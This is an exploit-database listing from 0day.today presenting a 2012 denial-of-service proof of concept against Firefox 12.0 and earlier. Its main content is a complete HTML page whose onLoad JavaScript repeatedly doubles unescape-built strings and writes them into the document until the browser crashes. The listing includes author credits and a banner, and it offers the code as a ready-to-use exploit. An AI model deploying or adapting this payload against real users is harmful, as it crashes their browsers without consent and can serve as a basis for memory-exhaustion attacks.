[ authorization ] [ registration ] [ Yenileme ]
Iletisim
Bize ulasabilirsiniz:
0day.today Exploits Market and 0day Exploits Database

Mozilla Firefox <= 12.0 Denial Of Service Exploit

Yazar
nimaarek
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-18195
Kategori
dos / poc
Eklenme Tarihi
05-05-2012
Platform
windows
Title: Mozilla Firefox <=12.0 Denial Of Service Exploit
Author: L20ot - l20ot[at]yahoo[dot]com
Software Link: http://www.mozilla-europe.org/en/firefox/
Version: 12.0 - lastversion
Tested on: Windows 7 x32\x64
Description: visiting this php page you'll get an instant crash of Firefox
Greetz: nimaarek & MOH3NCODEr [inoob team]


 _        _______  _______  _______ _________
( \      / ___   )(  __   )(  ___  )\__   __/
| (      \/   )  || (  )  || (   ) |   ) (   
| |          /   )| | /   || |   | |   | |   
| |        _/   / | (/ /) || |   | |   | |   
| |       /   _/  |   / | || |   | |   | |   
| (____/\(   (__/\|  (__) || (___) |   | |   
(_______/\_______/(_______)(_______)   )_(   

<html>
<title>FF go away :)</title>
<head>
<script>
function FTB()
 {
    var A1 = unescape("%u4141%u4141");
    var A2 = unescape("%u4242%u4242");
    var A3 = unescape("%u4343%u4343");
    var A4 = unescape("%u4444%u4444");
    for(i=0; i <= 1000 ; ++i)
 {
        A1+=A1;
        A2+=A2;
        A3+=A3;
        A4+=A4;
        document.write(A1);
        document.write(A2);
        document.write(A3);
        document.write(A4);
    }
    document.write(A1);
    document.write(A2);
    document.write(A3);
    document.write(A4);
}
</script>
</head>
<body onLoad="FTB()">
</body>
</html>



#  0day.today [2024-07-04]  #